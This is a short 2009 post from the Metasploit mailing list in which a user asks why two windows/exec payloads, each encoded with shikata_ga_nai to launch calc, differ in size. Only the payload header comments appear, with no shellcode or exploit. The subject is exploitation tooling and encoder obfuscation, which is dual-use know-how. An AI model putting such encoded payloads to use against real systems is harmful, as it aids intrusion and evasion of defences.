Metasploit mailing list archives

different payload size


From: "Aczire" <aczire () gmail com>
Date: Sat, 19 Dec 2009 18:21:50 +0530

Hi all,

 

What's the difference between these two, same for me, but..

 

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc


What am I missing?

 

Thanks in advance,

Acz
